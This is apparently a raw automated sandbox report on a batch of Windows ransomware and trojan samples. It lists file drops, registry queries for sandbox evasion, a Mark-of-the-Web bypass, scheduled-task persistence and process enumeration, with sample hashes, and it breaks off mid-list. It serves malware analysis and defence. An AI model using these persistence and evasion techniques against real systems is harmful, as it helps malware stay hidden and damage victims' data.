HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-125_contrast-white.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\1850_24x24x32.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\offlineUtilities.js HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-100.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\dt_shmem.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019DemoR_BypassTrial180-ul-oob.xrm-ms.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\de\UIAutomationTypes.resources.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\dictation\SpeechOn.wav HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SpotlightCalendar_2017-03.gif.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Dark.scale-125.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\w2k_lsa_auth.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe -
Drops file in Windows directory 6 IoCs
Processes:
chromet.exeHEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exeTrojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exedescription ioc Process File opened for modification C:\Windows\chromet.exe chromet.exe File created C:\Windows\chromet.exe HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe File opened for modification C:\Windows\chromet.exe HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe File opened for modification C:\Windows\assembly Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe File created C:\Windows\assembly\Desktop.ini Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe File opened for modification C:\Windows\assembly\Desktop.ini Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
Processes:
cmd.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe:Zone.Identifier cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 5100 2864 WerFault.exe 130 3648 3664 WerFault.exe 126 4692 4776 WerFault.exe 149 1992 5176 WerFault.exe 243 3652 5708 WerFault.exe 276 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Google.exeschtasks.exeattrib.exeRegasm.exeTrojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exeashcv.exename.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.execmd.execmd.exesiude.exeHEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exetmp1E0F.tmp.exeHEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exezbhnd.exewujek.exeHEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.execmd.exeWin.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.execmd.exeCOM7.EXEschtasks.execmd.exeTrojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exemagek.exeWin.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.execmd.exeHEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exeashcv.execmd.exeMServices.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeTrojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exeDLL32.exeHEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exeNOTEPAD.EXETrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeschtasks.exeWScript.exeHEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exeTrojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exeTrojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exeTrojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exeCOM7.EXERegAsm.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exenetsh.exereg.exemagek.exeHEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exeHEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exeTemp4qsldidhv1r.exetaskkill.exeHEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exeTrojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exeWin.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exemain.exeHEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exeTrojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.execmd.exePowershell.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exetaskkill.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Google.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Regasm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ashcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language name.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language siude.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp1E0F.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zbhnd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wujek.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Win.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language COM7.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language magek.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ashcv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MServices.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DLL32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language COM7.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language magek.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp4qsldidhv1r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Win.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x000a000000023b85-153.dat nsis_installer_1 behavioral1/files/0x000a000000023b85-153.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid Process 2056 taskkill.exe 1824 taskkill.exe -
Modifies registry class 4 IoCs
Processes:
cmd.exeOpenWith.exeHEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exetmp1E0F.tmp.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings tmp1E0F.tmp.exe -
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 1 IoCs
Processes:
cmd.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe:Zone.Identifier cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 3232 schtasks.exe 5868 schtasks.exe 5288 schtasks.exe 5540 schtasks.exe 3512 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exetaskmgr.exetaskmgr.exepid Process 4316 powershell.exe 4316 powershell.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
Processes:
taskmgr.exeHEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exeDLL32.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exechromet.exepid Process 4996 taskmgr.exe 4560 HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe 636 DLL32.exe 5196 HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe 5064 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe 4008 chromet.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exepid Process 6012 Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe 6012 Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid Process 5820 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exepowershell.exetaskmgr.exetaskmgr.exeHEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exeHEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exeHEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exeHEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exeHEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exeHEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exeHEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exeMServices.exepowershell.exeTemp4qsldidhv1r.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exepowershell.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeTrojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exechromet.exeHEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exePowershell.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeGoogle.exepowershell.exesvchost32.exepowershell.exepowershell.exeDLL32.exepowershell.exepowershell.exepowershell.exeHEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exetask